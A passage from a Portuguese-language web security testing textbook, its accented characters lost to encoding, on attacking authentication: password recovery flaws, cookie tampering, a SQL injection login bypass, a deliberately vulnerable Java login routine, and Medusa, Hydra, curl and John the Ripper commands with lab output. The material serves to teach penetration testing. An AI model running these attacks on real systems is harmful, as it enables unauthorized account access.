de esquecimento da senha de acesso. Uma abordagem comum consiste na exibio de
um lembrete sobre a senha, cadastrado no momento da criao da conta.
O grande problema dessa soluo que os usurios, muitas vezes, definem a dica com o
valor da prpria senha, tornando a vida de um atacante extremamente fcil.
Outra maneira de implementar o requisito baseia-se no uso de perguntas secretas

pr-cadastradas, as quais precisam ser corretamente respondidas pelo suposto
usurio, antes que lhe seja concedido acesso ao mecanismo de recuperao de senha.
A Figura 3.14(a) exemplifica uma interface para recuperao de senhas, baseada em

pergunta secreta, e a Figura 3.14(b), a tela exibida quando a resposta correta fornecida.
Trs fraquezas ficam evidentes nesse exemplo: a primeira est relacionada ao conjunto
limitado de respostas para a pergunta secreta, o que permite um ataque de fora bruta,
no qual o usurio malicioso testa todas as possibilidades, uma a uma. Outra delas consiste
na exibio da senha original, o que possibilita se autenticar no sistema, sem que o
usurio legtimo perceba, salvo se a aplicao informar a data e o horrio da ltima Captulo 3 - Teste do mecanismo de autenticao
conexo, no incio de cada sesso. Por fim, a ltima vulnerabilidade consiste no armazena-
mento das senhas, de um modo que possvel recuper-las em claro. Embora esse
problema seja fundamental para a existncia da fraqueza anterior, ele no implica a
presena daquela em uma aplicao.
Figura 3.14
Mecanismo de
recuperao de
senhas: (a) Pergunta
secreta exibida. (b)
Resultado obtido
quando resposta
correta fornecida. (a) (b)
101
Alm das vulnerabilidades supracitadas, um mecanismo de recuperao de senhas pode
estar sujeito a diversos outros problemas de segurana (Stuttard e Pinto, 2007; Meucci et al.,
2008), juntamente, com os meios de explor-los.
Um mecanismo de recuperao de senhas pode estar sujeito a diversos outros pro- q

blemas de segurana:
1 Inexistncia de mecanismo de bloqueio.

1 Cadastro de perguntas secretas personalizadas.
1 Respostas disponveis em fontes pblicas.
1 Envio da senha original para uma conta pr-cadastrada de correio eletrnico.
1 Redirecionamento para uma sesso autenticada.
1 Solicitao da conta de correio eletrnico, para a qual as instrues para recuperao de
senha devem ser enviadas, aps perguntas secretas serem respondidas corretamente.
1 Recuperao de senha por equipe de suporte.

1 Falta de notificao de troca de senha.
1 Inexistncia de mecanismo de bloqueio: se a aplicao no impedir que mltiplas ten-
tativas malsucedidas e consecutivas de resposta s perguntas secretas sejam efetuadas,
a execuo de um ataque de fora bruta facilitado.
1 Cadastro de perguntas secretas personalizadas: usurios tendem a registrar per-

guntas, que so facilmente respondidas, como, por exemplo, voc gosta de futebol?
ou quantos filhos voc tem?. Note que as respostas das duas perguntas pertencem a
conjuntos de baixa cardinalidade.
1 Respostas disponveis em fontes pblicas: mesmo quando as respostas das perguntas

secretas escolhidas no so fceis de adivinhar, o mecanismo reduzido a p se o
usurio disponibiliza as informaes necessrias em redes sociais, pginas pessoais ou
qualquer outra fonte pblica. Note que essa fraqueza, na verdade, no da aplicao,
mas, sim, de natureza humana.
1 Envio da senha original para uma conta pr-cadastrada de correio eletrnico: similar
exibio da senha em tela, permite usar a aplicao, sem que o usurio legtimo saiba
do comprometimento. Porm, mais difcil de explorar, pois requer que o atacante des-
cubra a conta de e-mail do usurio e a senha correspondente.
1 Redirecionamento para uma sesso autenticada, aps perguntas secretas serem

respondidas corretamente: atacante consegue usar a conta comprometida indefinida-
mente, sem a cincia do usurio legtimo.
1 Solicitao da conta de correio eletrnico, para a qual as instrues para recupe-

rao de senha devem ser enviadas, aps perguntas secretas serem respondidas
corretamente: basta fornecer uma conta de e-mail, qual se tem acesso, para receber a
senha em claro ou um link para um formulrio, no qual ela pode ser redefinida. Observe
que algumas aplicaes no solicitam a conta de e-mail de destino, mas a embutem em
um campo escondido. Nesse caso, suficiente utilizar um proxy de interceptao para
alterar o valor do campo e obter o mesmo resultado.
1 Recuperao de senha por equipe de suporte: em aplicaes utilizadas internamente

em uma empresa, comum delegar equipe de suporte o trabalho de recuperao de
senhas. Embora isso no seja uma vulnerabilidade por si s, o problema surge quando a
identidade do requerente no validada, antes do fornecimento de nova senha. Se isso
acontece, um atacante pode simplesmente ligar para o suporte, informando um identifi-
cador de usurio qualquer, para conseguir acesso ao sistema.
102
1 Falta de notificao de troca de senha: uma boa prtica de segurana sempre
Incidente de segurana permitir a deteco de incidentes de segurana, se no for possvel evit-los. Assim,
Corresponde violao quando houver uma troca de senha, por meio do mecanismo de recuperao, uma men-
de polticas implcitas e
sagem de notificao deve ser enviada a uma conta pr-cadastrada de correio eletrnico,
explcitas de segurana
da informao. pertencente ao usurio legtimo. Com esse controle, mesmo que uma conta seja compro-
metida, o proprietrio ficar ciente do fato e poder agir, diminuindo o dano causado.
Funcionalidade Lembrar usurio

Algumas aplicaes web disponibilizam uma funcionalidade que permite lembrar o q
usurio, automaticamente, toda vez que forem utilizadas.
Isso implementado por meio de um cookie persistente, contendo o identificador do

usurio, que armazenado pelo navegador web e enviado toda vez que o domnio que o
definiu acessado.
Se o mecanismo ativado em um computador de uso pblico, a conta da ltima pessoa que q

usou a aplicao revelada, possibilitando o mesmo conjunto de ataques, decorrente da
enumerao de usurios. Um cenrio mais grave resulta quando a aplicao usa o cookie
para autenticar o usurio, automaticamente, sem a necessidade de fornecimento de senha.
Nesse caso, fica evidente que o roubo do cookie suficiente para uma pessoa maliciosa
acessar o sistema, de maneira no autorizada, mesmo desconhecendo, completamente,
quaisquer credenciais vlidas. A subtrao do cookie pode ser executada por meio de um
ataque cross-site scripting (Captulo 5), comprometimento da mquina do usurio ou em
trnsito, quando um canal seguro no utilizado (Captulo 9).
Uma pequena variao no ataque acima permite que um usurio legtimo escale privil- q
gios na aplicao.
Para isso, ele precisa apenas alterar o valor do atributo que indica o usurio, para o iden-
tificador de uma conta com mais privilgios. Por exemplo, se o cookie possui um par
usuario=fulano, sabendo-se da existncia da conta admin, basta realizar a modificao
usuario=admin para concluir a explorao. No caso de um teste caixa-cinza, em que
algumas contas de acesso so fornecidas para o analista de segurana, a presena dessa
vulnerabilidade permite se conectar com qualquer conta conhecida.
Transporte inseguro de credenciais de acesso

Quando existe a possibilidade de credenciais de acesso serem enviadas para o destino q Captulo 3 - Teste do mecanismo de autenticao
incorreto ou capturadas em trnsito, diz-se que so transportadas de maneira inse-
gura. A falha mais comum nesse sentido consiste no envio das informaes em claro ou
apenas codificadas, o que permite que sejam interceptadas em qualquer ponto entre a
origem e o destino.
Postar os dados de formulrios de autenticao ou as credenciais obtidas pelo mtodo

Basic, por meio do protocolo HTTP simples, , portanto, uma prtica totalmente vulnervel,
que jamais deve ser adotada. Para exemplificar, a Figura 3.15 ilustra dados de autenticao
Basic capturados, a partir da escuta da rede, que podem ser facilmente decodificados para
esruser: esruser.
comum encontrar na internet aplicaes web que enviam as informaes de autenti- q

cao, via protocolo HTTPS, mas que fornecem a pgina para captur-las, empregando
HTTP simples.
103
Se, por um lado, no factvel obter, a partir da rede, os dados de conta submetidos ao
servidor da aplicao, por outro possvel violar a integridade da pgina de autenticao
injetando cdigo malicioso para captura de teclas digitadas ou alterando os elementos da
pgina apresentada, de modo a redirecionar as informaes para outro destino. Portanto,
fundamental que a pgina, na qual o usurio digita identificador e senha, seja provida por
canal seguro.
Outra vulnerabilidade, que afeta a transmisso das credenciais, consiste na passagem q

dessas informaes como parmetros da URL.
Mesmo que um canal seguro seja empregado, o identificador e senha fornecidos pelo
usurio so mantidos no histrico de navegao e em trilhas de auditoria do servidor
web. Se este estiver mal configurado, do ponto de vista de segurana, permitindo acesso
aos arquivos do sistema, um atacante pode copiar as trilhas mencionadas e extrair delas
diversas credencias vlidas.
Finalmente, a camada SSL/TLS, provida pelo servidor web, pode estar mal configurada q Figura 3.15
e permitir o uso de verses vulnerveis desses protocolos, alm de sutes criptogrficas Dados de autenti-
cao HTTP Basic
fracas, sujeitas a ataques criptoanalticos. capturados em
trnsito.
Esses problemas so discutidos em detalhes no Captulo 9, que trata de falhas nos meca-
nismos criptogrficos.
Falhas na implementao do mecanismo

Uma das regras de ouro em desenvolvimento de software seguro determina que, em q
caso de falhas inesperadas, a aplicao deve sempre se manter em um estado seguro.
Por exemplo, se por um motivo qualquer, a conexo com a base de usurios finalizada,
impedindo o processo de autenticao, o acesso do reclamante deve ser negado. Infeliz-
mente, essa diretriz bsica no seguida em profuso, conduzindo a diversos tipos de
vulnerabilidades, que afetam, sobretudo, os mecanismos de controle de acesso.
Considere a aplicao ilustrada na Figura 3.16, que permite acesso s reas sensveis,
somente aos usurios devidamente autenticados e autorizados. Observe que o nome de
usurio e a senha so enviados, em dois parmetros distintos, por meio do mtodo POST,
quando o boto Login clicado.
104
Figura 3.16
Tela de autenticao
e formato
da requisio. Se a aplicao no tratar erros inesperados adequadamente, conforme discutido, um q
usurio malicioso pode se autenticar, mesmo sem conhecimento da senha correspon-
dente. Um teste que deve ser executado, ento, resume-se na remoo de um ou mais
parmetros esperados pela aplicao, antes do envio da requisio, para induzir a ocor-
rncia de um erro.
Isso pode ser realizado com auxlio de um proxy de interceptao, conforme ilustrado na Figura
3.17. Note que, de fato, o sistema apresenta a vulnerabilidade descrita e pode ser explorado.
Figura 3.17 Testes adicionais que devem ser realizados, com o mesmo objetivo acima exemplificado, q
Requisio efetuada incluem:
sem o parmetro
Password. 1 Submisso de identificadores de usurio e de senhas maiores que o tamanho
mximo permitido pela aplicao.
1 Incluso de parmetros invlidos na requisio.

1 Envio de identificadores de usurio e de senha contendo caracteres no permitidos.
1 Submisso de valores vazios. Captulo 3 - Teste do mecanismo de autenticao
Vejamos agora outro tipo de problema, que afeta, comumente, aplicaes que armazenam
a base de usurios em um banco de dados relacional. A rotina que efetua a autenticao,
nesses casos, realiza uma consulta SQL ao banco, em busca de um registro que contenha o
identificador de usurio e senha fornecidos. Se nenhuma tupla for encontrada, o reclamante
no validado e o acesso ao sistema negado. O cdigo que realiza essa verificao, fre-
quentemente, se assemelha ao apresentado na Figura 3.18, o qual, se percebe, vulnervel
injeo de SQL (Captulo 6).
105
sComando = select count(*) into :nCount
from usuarios
where id = + sIdentificador + and
senha = + sSenha + ;
SqlExecute(hSql, sComando);
Figura 3.18
if (nCount > 0) print(Usurio autenticado); Exemplo de trecho
de cdigo emprega-
do para autentica-
o de usurios,
que vulnervel
injeo de SQL.
Nesse cenrio, o mecanismo de autenticao pode ser quebrado com os seguintes passos:
1. Usurio malicioso digita o caractere no campo de identificador e descobre que a apli-

cao vulnervel injeo de SQL.
2. O atacante fornece o valor or 1=1;-- para o campo usurio e um valor qualquer para
a senha. A sequncia ;-- serve para comentar o restante da linha e evitar um erro de
sintaxe decorrente do texto que sobra.
3. A aplicao executa a consulta SQL:
select count(*) into :nCount
from usuarios
where id = or 1=1;-- and
senha = qualquervalor;
4. Como a expresso 1=1 uma tautologia, o where avaliado como verdadeiro para
todas as tuplas da tabela e a quantidade delas ser armazenada na varivel nCount.
Devido construo do if, que verifica se qualquer registro foi encontrado, a aplicao
autentica o usurio, mesmo sem ele saber a senha correta.
Encerramos o presente tpico com a anlise da rotina de autenticao ilustrada na Figura 3.19,
que est repleta de vulnerabilidades descobertas, no passado, em sistemas reais. Um pro-
blema que ainda no foi discutido neste texto est no lao das linhas 8-10, responsvel por
comparar a senha armazenada com a fornecida. Observe que o lao executado enquanto
no forem encontrados caracteres divergentes e o ndice for menor que o tamanho da
senha informada. Esse ltimo exatamente o ponto problemtico, pois permite que um
usurio se autentique, com uma senha de apenas um caractere, desde que corresponda ao
primeiro da senha armazenada. fcil perceber que um ataque de fora bruta, nesse caso,
seria trivialmente executado.
106
01 public static boolean auth(String id, String pwd) {
02 String senhaArmazenada = getPwd(id);
03 boolean bAuth = senhaArmazenada != null;
04
05 try {
06 if (senhaArmazenada != null) {
07 pwd = pwd.toUpperCase();
08 for (int i = 0; i < pwd.length() && bAuth; i++) {
09 bAuth = pwd.charAt(i) == senhaArmazenada.charAt(i);
10 }
11 }
12 } catch (Exception e) {
13 }
14
Figura 3.19
Rotina de autenti- 15 return bAuth;
cao com diversas
vulnerabilidades. 16 }
As demais vulnerabilidades do cdigo pertencem, em sua grande maioria, a classes j

discutidas anteriormente:
1 Considerando que o parmetro pwd corresponde senha digitada pelo usurio, as

senhas devem estar armazenadas em claro ou por mecanismo reversvel para que a com-
parao da linha 09 seja possvel.
1 Se um identificador vlido e uma senha nula so passados como argumentos para a

funo, a autenticao bem-sucedida, porque a linha 07 gera uma exceo, que evita a
comparao das senhas e faz com que o valor corrente de bAuth, iniciada com true, seja
devolvido.
1 A rotina retorna true, caso sejam fornecidas uma conta vlida e a senha correta adicio-
nada de um sufixo qualquer. A razo disso que senhaArmazenada.charAt(i), na linha 09,
gera uma exceo, quando o primeiro caractere do sufixo comparado, fazendo com que
o valor corrente da varivel bAuth seja devolvido.
1 A linha 07 indica que no so diferenciadas letras maisculas de minsculas, o que

implica uma grande reduo no nmero de senhas possveis, favorecendo um ataque de
fora bruta.
Mecanismo vulnervel de troca de senhas

Diversos padres de segurana, como o PCI DSS demandam que senhas de usurios q
sejam trocadas periodicamente.
107
As justificativas para a adoo dessa prtica resumem-se em diminuir a janela de exposio
de uma conta comprometida e dificultar ataques contra arquivos de senhas, pois, na ocasio
em que uma delas seja encontrada, no ter mais utilidade nenhuma, por j ter sido alte-
rada (Stuttard e Pinto, 2007).
Visando satisfazer o supracitado requisito, muitas aplicaes incluem uma funciona- q

lidade para troca de senhas, mas nem todas a implementam de maneira segura. Um
problema muito comum deixar de pedir a senha atual nesse processo, porque a tela
para efetuar essa operao s acessvel a usurios autenticados.
Para ilustrar como isso pode ser atacado, consideremos um cenrio em que a nova senha
solicitada duas vezes, o identificador do usurio atual mantido em um campo escondido
e o formulrio submetido por POST. Nesse contexto, possvel alterar a senha de outro
usurio da seguinte maneira:
1. Um usurio malicioso habilita um proxy local, para interceptar todas as requisies feitas
para a aplicao.
2. Ele se autentica na aplicao e, em seguida, acessa a pgina para troca de senhas,

residente na rea protegida.
3. O atacante digita duas vezes a nova senha, nos campos correspondentes, e envia a requi-
sio, que interceptada pelo proxy. De modo a completar o ataque, ele altera o valor
do campo escondido, para o identificador da vtima, cuja senha , ento, trocada pela
escolhida.
4. A partir disso, a conta comprometida fica disponvel para acesso no autorizado, at que o
usurio legtimo defina nova senha, quando, ento, o ataque pode ser novamente executado.
Autenticao com mltiplos fatores

Conforme vimos, sistemas que manipulam informaes crticas so fortes candidatos a q
empregar mltiplos fatores de autenticao, porque requerem um alto nvel de segurana.
Um claro exemplo disso so as aplicaes de internet banking, com as quais grandes somas
de dinheiro so transferidas diariamente, entre diversas contas e entidades. Por mais
simples que seja o tipo de conta, necessrio, pelo menos, saber uma senha, diferente da
utilizada nos caixas fsicos, e possuir algum tipo de token, normalmente, na forma de uma
cartela de valores. Para clientes que esto sujeitos a maior risco, como as pessoas jurdicas,
por exemplo, so empregados, muitas vezes, at trs fatores de autenticao.
Uma sesso em uma aplicao desse tipo comea, tipicamente, com a autenticao do q
usurio por meio da senha, o que permite acesso a diversas funcionalidades bsicas.
Quando uma operao envolvendo valores financeiros solicitada, o usurio precisa
fornecer novamente a senha e utilizar o segundo fator, para comprovar sua identidade.
Uma implementao segura desse cenrio requer que as informaes de autenticao
j validadas sejam mantidas exclusivamente no servidor e que etapas do processo no
possam ser ignoradas.
A falta de observao desses importantes preceitos o que conduz a vulnerabilidades em

tais solues, conforme ilustrado nos cenrios abaixo (Stuttard e Pinto, 2007):
108
1 Informaes sobre as diversas etapas da autenticao so mantidas em parmetros
enviados ao lado cliente, como tokenValidado=N, por exemplo. Um teste imediato que
deve ser efetuado trocar o valor para S ou Y, efetuar uma requisio aplicao e ver
como o sistema se comporta. Em situaes assim, h grande chance de o processo de
autenticao ser evadido, obtendo-se com isso acesso no autorizado ao sistema.
1 Uma aplicao, que usa cartelas de senha como segundo fator de autenticao, mantm,
em um campo escondido, o identificador do usurio corrente, uma vez que este j tenha
se autenticado por senha. Nas requisies subsequentes, o sistema extrai o nome da
conta a partir desse campo, em vez de obt-lo a partir do objeto de sesso salvo no ser-
vidor. Um teste que pode ser realizado consiste em interceptar uma requisio de auten-
ticao via segundo fator e alterar o par (identificador, valor da cartela) com os dados
de outro usurio. Se a operao for realizada com sucesso, significa que a aplicao no
amarra as diversas etapas da autenticao corretamente.
1 A rotina que trata uma determinada operao assume que, se foi chamada, todos os
fatores de autenticao j foram validados. O problema nesse caso que a premissa
adotada pode ser falsa e o correto, ento, consiste em verificar se todas as etapas foram
completadas com sucesso, antes de atender a solicitao. Para testar a presena dessa
vulnerabilidade, todos os passos da operao devem ser executados com uma conta vlida,
para que as diversas requisies aplicao sejam mapeadas. Em seguida, deve-se tentar
repetir as requisies identificadas, mas desconsiderando aquelas referentes ao processo
de autenticao. Se nenhum erro ocorrer, a aplicao se encontra vulnervel.
Ataque de fora bruta

Um ataque de fora bruta consiste em tentar se autenticar com todas as senhas pos- q
sveis, at que o processo seja bem-sucedido. A tarefa pode se estender por um longo
perodo de tempo, dependendo do tamanho mnimo de senha adotado e do total de
possibilidades por posio. Devido ao trfego que gera, a tcnica extremamente
ruidosa e, por isso, facilmente percebida por dispositivos de deteco de intruso.
Se um controle de bloqueio de contas, por mltiplas tentativas invlidas de autenticao,

estiver implementado, as contas da aplicao sero rapidamente travadas.
Por todas essas desvantagens, um ataque desse tipo deve ser utilizado somente como
ltimo recurso de um teste de invaso caixa-preta, quando nenhuma outra vulnerabili-
dade pde ser encontrada.
Um software antigo, mas que permite realizar esse tipo de teste, o Brutus, o qual pode ser
configurado de diversas maneiras diferentes, contra diversos tipos de protocolos. A Figura 3.20
ilustra um exemplo de uso bem-sucedido dessa ferramenta, que possibilitou encontrar a

senha juk para a conta esr.
109
Ataque de dicionrio
q
Figura 3.20
Como vimos, um ataque de fora bruta apresenta diversos problemas, podendo Ataque de fora
bruta contra Auten-
demorar muito tempo para atingir um resultado positivo se o espao de senhas for ticao Basic.
demasiado grande. A falha na abordagem que todas as senhas so consideradas poss-
veis candidatas, embora usurios raramente escolham sequncias sem sentido.
Em vez disso, para facilitar a memorizao, a grande maioria das pessoas utiliza palavras
do idioma, nomes de familiares, datas, nmeros de documento e pequenas variaes. Por
exemplo, n0rm@2011 pode ser usado no lugar de norma2011.
Tendo esse fato em mente, uma abordagem mais inteligente resulta no ataque de dicionrio, q
que seleciona as senhas para teste a partir de uma lista de palavras comuns e variaes.
Com essa estratgia, senhas improvveis para a maioria dos usurios so descartadas,
economizando com isso uma boa parcela de tempo. Observe, no entanto, que, apesar do
universo reduzido de senhas a serem testadas, as questes de bloqueio de conta e deteco
por dispositivos de segurana continuam presentes.
q
Alguns exemplos de utilitrios, que podem ser empregados para realizar ataque de Cygwin
dicionrio contra aplicaes web, incluem: Arcabouo que permite
compilar aplicaes
1 Brutus: um software livre, fornecido nativamente apenas para plataformas desenvolvidas para
Windows, mas que pode ser executado tambm em Linux, via Wine. Permite testar Linux, em ambientes
autenticao HTTP Basic e a baseada em formulrios, alm de outros servios. Windows, por meio de
uma camada, na forma
1 THC Hydra: distribudo sob licena GPLv3, funciona em todas as plataformas Unix/ de uma biblioteca
Linux, Mac OS/X, Windows com Cygwin e PalmOS. Suporta HTTP Basic, HTTP Digest, dinmica que prov
grande parte da
autenticao baseada em formulrios e verses protegidas por SSL/TLS, alm de in-
funcionalidade da
meros outros servios. Alm disso, prov uma interface grfica chamada de xHydra. API Linux.
110
1 Medusa: fornecido sob licena GPLv2, com suporte a todas as plataformas Unix/Linux, q
Mac OS/X e Windows com Cygwin. Suporta HTTP Basic, HTTP Digest, autenticao baseada
em formulrios e verses protegidas por SSL/TLS, alm de inmeros outros servios.
Vejamos agora como funcionam essas ferramentas. A Figura 3.21 ilustra o resultado de um
ataque bem-sucedido do Brutus contra autenticao HTTP Basic, o qual revelou um usurio
esruser com senha idntica. Comparando com a configurao da Figura 3.20, utilizada para
fora bruta, percebe-se que as diferenas residem no modo Word List e no fornecimento de
arquivos contendo listas de palavras para identificador de usurio e para senha.
Figura 3.21 Para executar o mesmo teste acima com o utilitrio Medusa, deve-se digitar o seguinte comando:
Ataque de dicion-
rio contra Autenti- ~$ medusa -h exemplo.esr.rnp.br -U ids -P ids -e ns -M http 8
cao Basic. Captulo 3 - Teste do mecanismo de autenticao
-m DIR:basic/ -v 4
Medusa v1.5 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks

<jmk@foofus.net>
ACCOUNT FOUND: [http] Host: exemplo.esr.rnp.br User: esruser

Password: esruser [SUCCESS]
As opes do programa utilizadas no cenrio so:
1 -h indica o nome de domnio do alvo.

1 -U arquivo contendo lista de identificadores de usurio, um por linha.
1 -P arquivo contendo dicionrio de senhas, um item por linha.
111
1 -e n serve para testar senha nula e s, senha idntica ao identificador.
1 -M indica o mdulo a ser carregado para o teste.
1 -m parmetros passados para o mdulo.
1 -v controla a quantidade de informaes exibidas ao usurio.
O prximo exemplo ilustra um teste de dicionrio, efetuado pela ferramenta Hydra, contra
o mecanismo de autenticao HTTP Digest, que revelou, com sucesso, a conta esruser com
senha esruser. Note-se que a sintaxe apresenta certa semelhana com a da Medusa, o que
esperado, considerando que os dois programas possuem o mesmo propsito. As opes
-L e -P indicam, respectivamente, os nomes dos arquivos contendo os dicionrios de
identificadores de usurio e de senhas; -e ns testa com senha nula e igual ao identificador;
http-head define o protocolo e o mtodo; por fim, o ltimo parmetro varia de acordo com
o servio e , no caso de http-head, especifica a pgina que requer autenticao.
~$ hydra -L ids -P pwds -e ns exemplo.esr.rnp.br http-head /digest/
Hydra v6.3 (c) 2011 by van Hauser / THC and David Maciejak - use
allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2011-05-28 23:26:19
[DATA] 16 tasks, 1 servers, 48 login tries (l:6/p:8), ~3 tries per

task
[DATA] attacking service http-head on port 80
[STATUS] attack finished for exemplo.esr.rnp.br (waiting for children

to finish)
[80][www] host: 192.168.213.200 login: esruser password: esruser
Hydra (http://www.thc.org/thc-hydra) finished at 2011-05-28 23:26:23
Trocando-se http-head por http[s]-form-post, possvel realizar o teste contra um

sistema que utiliza autenticao baseada em formulrio. As informaes necessrias para
construo da requisio devem ser passadas no ltimo parmetro, de acordo com o
seguinte formato:
<url do autenticador>:<parmetros da requisio>:<mensagem de erro>
H duas variveis especiais, ^USER^ e ^PASS^ , que so substitudas, na execuo de

Hydra, por todas as possveis combinaes de identificador de usurio e de senha formadas
a partir das listas de palavras passadas pelo analista. Por esse motivo, devem ser empre-
gadas, na requisio HTTP, como os valores dos parmetros referentes s credenciais de
acesso de usurio.
O resultado disso tudo, quando aplicado ao formulrio da Figura 27, o comando abaixo
ilustrado. Um ponto importante que deve ser observado que a sintaxe s permite destacar
uma nica mensagem de erro. Porm, no cenrio em questo, a aplicao web exibe textos
diferentes para senha incorreta e usurio inexistente. Consequentemente, se a lista de
identificadores passada por meio da opo -L contiver usurios invlidos, falsos positivos
ocorrero, porque o utilitrio no conseguir interpretar a mensagem de erro devolvida.
~$ hydra -L ids -P pwds -e ns form-auth.esr.rnp.br http-post-form 8
/login.php:userid=^USER^&senha=^PASS^&Submit1=Login:incorreta
112
Hydra v6.3 (c) 2011 by van Hauser / THC and David Maciejak - use
allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2011-05-29 01:54:53
[DATA] 16 tasks, 1 servers, 40 login tries (l:5/p:8), ~2 tries per

task
[DATA] attacking service http-post-form on port 80
[80][www-form] host: 192.168.213.200 login: admin password:

admin
[80][www-form] host: 192.168.213.200 login: user password: 123
[STATUS] attack finished for form-auth.esr.rnp.br (waiting for

children to finish)
[80][www-form] host: 192.168.213.200 login: usuario password:

senha
Hydra (http://www.thc.org/thc-hydra) finished at 2011-05-29 01:54:54
Essa limitao apresentada pelo utilitrio Hydra pode ser facilmente superada, por meio
de uma adaptao no script da Figura 3.12, utilizado para enumerao de usurios. Basi-
camente, um lao externo deve ser adicionado para varrer o dicionrio de senhas, e o
comando condicional, limitado ao caso de autenticao bem-sucedida. A Figura 3.22 exibe o
novo script, contendo as alteraes necessrias.
# !/bin/bash
for pwd in $(cat pwds)
do
for id in $(cat ids)
do
if [ $(curl -s --data userid=$id&senha=$pwd&Submit1=Login \
http://form-auth.esr.rnp.br/login.php | \
grep -c bem-vindo) -ne 0 ];
then
echo ($id, $pwd)
fi
Figura 3.22
Script para teste de done
dicionrio contra
formulrios de done
autenticao.
113
Ataque contra senhas armazenadas
Durante um teste de invaso em aplicaes web, no raro obter senhas a partir de q
arquivos e bancos de dados.
Quando isso acontece, ou elas esto armazenadas completamente em claro ou so protegidas

por algum mecanismo criptogrfico, mas de maneira vulnervel. No melhor caso, quando a
proteo das senhas em disco feita corretamente, pode ocorrer de a qualidade delas ser
muito baixa, devido a usurios no conscientizados em segurana da informao.
Qualquer que seja o cenrio, entretanto, o objetivo a ser perseguido sempre a extrao q
de credenciais vlidas para acesso ao sistema alvo. Para isso, podem ser utilizadas tcnicas
baseadas em criptoanlise, tema do Captulo 9, ou calcadas na fraqueza das senhas.
Um timo utilitrio, nesse contexto, o John the Ripper, disponvel para diversas plata-
formas, sob licena GPLv2, e com suporte nativo a arquivos de senhas de sistemas Unix/
Linux, Windows e Kerberos/AFS. Visando um maior desempenho, em vez de utilizar a API
crypt, alguns dos algoritmos criptogrficos e rotinas de suporte foram desenvolvidos direta-
mente em linguagem Assembly, para vrias arquiteturas diferentes, sobretudo x86.
H trs modos de operao pr-definidos, que adotam estratgias diferentes para recu- q
perao das senhas, a partir dos arquivos protegidos:
1 Single-crack: utiliza como candidatas a senhas o prprio identificador de usurio,

campo GECOS, diretrio home da conta e diversas variaes sobre esses valores. GECOS
Se uma senha validada, ela automaticamente testada contra as demais contas uma entrada no
arquivo /etc/passwd,
fornecidas, sob a hiptese de uma senha padro ser adotada no ambiente.
em sistemas Unix/Linux,
1 Lista de palavras: efetua um ataque de dicionrio com base na lista de palavras que contm informaes
sobre a conta de
fornecidas e variaes definidas pelas regras habilitadas. Palavras repetidas no so
usurio, como nome e
desconsideradas e o processo executado mais rapidamente se houver mudana de telefone, por exemplo.
apenas poucos caracteres entre valores consecutivos.
1 Incremental: realiza um ataque de fora bruta, variando os caracteres de acordo

com o alfabeto definido para o teste. Para aumentar a eficcia, quando possvel, con-
sidera a frequncia de ocorrncia na lngua de sequncias especficas de trs letras,
utilizando as mais provveis primeiramente.
O exemplo abaixo ilustra a maneira mais simples de utilizar a ferramenta para quebrar
um arquivo de senhas. Quando nenhum parmetro adicional, alm do nome de arquivo,
passado na linha de comando, John the Ripper opera nos trs modos disponveis, na ordem
em que foram acima apresentados, at que o trabalho seja concludo, ou interrompido
pelo usurio. Observe-se que as senhas em claro, neste caso especfico, foram encontradas
aps meros 14 segundos. importante ter em mente, porm, que muitas vezes, se no na
maioria, a tarefa consumir tempo bem maior.
~$ john passwords
Loaded 3 password hashes with 3 different salts (Traditional DES

[64/64 BS MMX])
esruser (esruser)
juk (esr)
senhad (hard)
guesses: 3 time: 0:00:00:14 (3) c/s: 812046 trying: secKXy senhhr
114
Ataques de dicionrio so muito mais eficientes que os de fora bruta, porque senhas q
improvveis no so testadas no processo. A eficcia do mtodo, porm, depende da
qualidade e tamanho da lista empregada de palavras, uma vez que a senha deve estar
contida nela, para o ataque funcionar.
Nos casos em que a tcnica utilizada contra arquivos de senhas, possvel conseguir um
grande ganho de desempenho, pois no preciso verificar as palavras uma a uma. A ideia
consiste em alterar a estrutura do dicionrio, de modo a incluir, para cada palavra, a contra-
parte protegida, que passa a ser a chave de busca. Desse modo, para cada senha protegida
do arquivo alvo, verifica-se se o dicionrio contm um registro correspondente e, em caso
positivo, a senha em claro a palavra associada.
Uma abordagem mais elegante, que permite reduzir o consumo de espao, resume- q
-se no uso de rainbow tables, que foram introduzidas por Oeschslin (2003) como uma
melhoria do trabalho de Hellman (1980).
Para a explicao a seguir, considere-se que as senhas so protegidas, por meio de uma
funo de hash criptogrfica, denotada por h(x), e que Ri(x) corresponde a uma famlia de
funes que mapeiam hashes para senhas.
O elemento central da soluo o rainbow chain, que consiste em uma sequncia de q

valores alternados de senhas e hashes, calculados a partir de uma senha inicial.
h(s1) R1(h1) h(s2) h(st-1) Rt-1(ht-1)

s1 h1 s2 ht-1 st
Diversas cadeias de mesmo comprimento so geradas, a partir de senhas iniciais dife-

rentes, e somente o primeiro e ltimo elementos de cada uma delas so armazenados,
resultando em economia de espao.
Note que com esses valores possvel reconstruir qualquer cadeia na tabela, bastando para
isso aplicar alternadamente h(x) e Ri(x) senha inicial.
Para verificar se possvel recuperar a pr-imagem (senha) de um hash H qualquer, a partir

da tabela, os seguintes passos devem ser efetuados:
1. Seja a i-sima cadeia parcial a sequncia de valores alternados de hashes e senhas, calculados
a partir de Ri(H), com 1 i t 1:
R1(H) h(si+1) Ri+1(hi+1) h(st-1) Rt-1(ht-1)

H1 si+1 hi+1 ht-1 st

2. Iniciando com i = t 1 e decrescendo at i = 1, calculam-se as cadeias parciais, at que
a senha final (s t) seja encontrada como elemento final de uma linha L da tabela. Se isso
ocorrer, procede-se ao passo seguinte; se no, o teste encerrado sem sucesso.
3. Neste passo, a cadeia reconstruda a partir da senha inicial recuperada da linha L, at hi,
o qual deve ser comparado contra H. Se os valores forem iguais, a senha procurada a si,
isto , aquela imediatamente anterior ao hi. Caso contrrio, obteve-se um falso alarme e o
processo deve retornar ao Passo 1, a partir da ltima cadeia parcial avaliada.
Na prtica, o processo de busca bem rpido, mas dependendo dos comprimentos de

senha contemplados e dos alfabetos utilizados, o tamanho total das tabelas pode ultra-
passar vrios terabytes. Como o processo de gerao dessas tabelas bem demorado, o ideal
obt-las de algum lugar, j prontas, como o projeto Free Rainbow Tables, por exemplo. Nesse
site, esto disponveis tabelas gratuitas para MD5, SHA-1 e NTLM, entre outros formatos.
115
Entre os exemplos de softwares que podem ser empregados para realizar ataques base- q
ados em rainbow tables esto:
